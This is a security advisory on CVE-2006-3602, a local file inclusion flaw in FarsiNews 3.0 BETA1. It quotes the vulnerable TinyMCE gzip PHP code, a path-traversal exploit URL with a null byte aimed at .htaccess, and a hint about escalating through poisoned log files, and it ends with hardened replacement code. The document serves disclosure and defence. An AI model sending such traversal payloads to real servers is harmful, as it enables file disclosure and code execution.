SecurityTracker.com
Category:   Application (Forum/Board/Portal)  >   FarsiNews
Vendors:   farsinewsteam.com
FarsiNews Include File Bug Lets Users Execute Arbitrary Code
SecurityTracker Alert ID:  1016464
SecurityTracker URL:  http://securitytracker.com/id/1016464
CVE Reference:   CVE-2006-3602
Updated:  Jul 18 2008
Original Entry Date:  Jul 11 2006
Impact:   Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 3.0 BETA1
Description:   A vulnerability was reported in FarsiNews. A remote user can include and execute arbitrary code from local files on the target system.

The software does not properly validate user-supplied input. If magic_quotes_gpc is disabled, a remote user can supply a specially crafted URL to cause the target system to include and execute arbitrary PHP code from a file on the target system. The PHP code, including operating system commands, will run with the privileges of the target web service.

If the remote user can cause PHP code to be written to a file on the system (such as to a web server log file), then the remote user can cause arbitrary code to be executed by including the file.

A demonstration exploit URL is provided:

http://[target]/jscripts/tiny_mce/tiny_mce_gzip.php?language=../../../../.htaccess%00&theme=advanced

armin390 reported this vulnerability.

Impact:   A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.farsinewsteam.com/
Cause:   Input validation error, State error
Underlying OS:   Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Date:  10 Jul 2006 15:33:33 -0000
Subject:  Local file inclusion in Farsinews3.0BETA1

If magic_quotes_gpc is Off in php.ini, then local file inclusion in /jscripts/tiny_mce/tiny_mce_gzip.php is available to use ;)!!
Why?
#code(jscripts/tiny_mce/tiny_mce_gzip.php)
...
	$theme = isset($_REQUEST['theme']) ? $_REQUEST['theme'] : "";
	$language = isset($_REQUEST['language']) ? $_REQUEST['language'] : "";
	$plugins = isset($_REQUEST['plugins']) ? $_REQUEST['plugins'] : "";
...
	if ($theme) {
		// Write main script and patch some things
		echo file_get_contents(realpath("tiny_mce" . $suffix . ".js"));
		echo 'TinyMCE.prototype.loadScript = function() {};';
		echo "tinyMCE.init(TinyMCECompressed_settings);";

		// Load theme, language pack and theme language packs
		echo file_get_contents(realpath("themes/" . $theme . "/editor_template" . $suffix . ".js"));
		echo file_get_contents(realpath("themes/" . $theme . "/langs/" . $language . ".js"));
		echo file_get_contents(realpath("langs/" . $language . ".js"));

#exploit
for example!:
http://target/jscripts/tiny_mce/tiny_mce_gzip.php?language=../../../../.htaccess%00&theme=advanced
...
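
The advisory lists no solution, so the following is an added example of how the theme and language handling quoted above could be hardened; it is not FarsiNews or TinyMCE code. The helper names safe_name and resolve_asset are hypothetical, PHP 5.3 or later is assumed, and the $suffix variable from the original excerpt is left out.

```php
<?php
// Added example (not FarsiNews or TinyMCE code): hardened handling of the
// theme/language parameters used by tiny_mce_gzip.php.

/** Accept only short identifiers such as "advanced", "en" or "fa_IR". */
function safe_name($value)
{
    // Non-string input (e.g. theme[]=x) and anything outside the allowlist
    // is rejected: this excludes "/", "\", "." and NUL bytes outright.
    if (!is_string($value) || !preg_match('/\A[A-Za-z0-9_-]{1,32}\z/', $value)) {
        return null;
    }
    return $value;
}

/** Resolve $relative under $baseDir; null unless it is a .js file inside it. */
function resolve_asset($baseDir, $relative)
{
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $relative);
    if ($base === false || $path === false) {
        return null; // missing file or directory
    }
    // Containment check after symlinks and ".." have been resolved.
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return (substr($path, -3) === '.js' && is_file($path)) ? $path : null;
}

$theme    = safe_name(isset($_REQUEST['theme']) ? $_REQUEST['theme'] : '');
$language = safe_name(isset($_REQUEST['language']) ? $_REQUEST['language'] : '');

if ($theme === null || $language === null) {
    header('HTTP/1.1 400 Bad Request');
    exit;
}

foreach (array(
    "themes/$theme/editor_template.js",
    "themes/$theme/langs/$language.js",
    "langs/$language.js",
) as $relative) {
    $file = resolve_asset(__DIR__, $relative);
    if ($file !== null) {
        echo file_get_contents($file);
    }
}
```

Unlike the original excerpt, this version answers a missing or empty theme with a 400 response instead of skipping the block, and it no longer depends on magic_quotes_gpc being enabled.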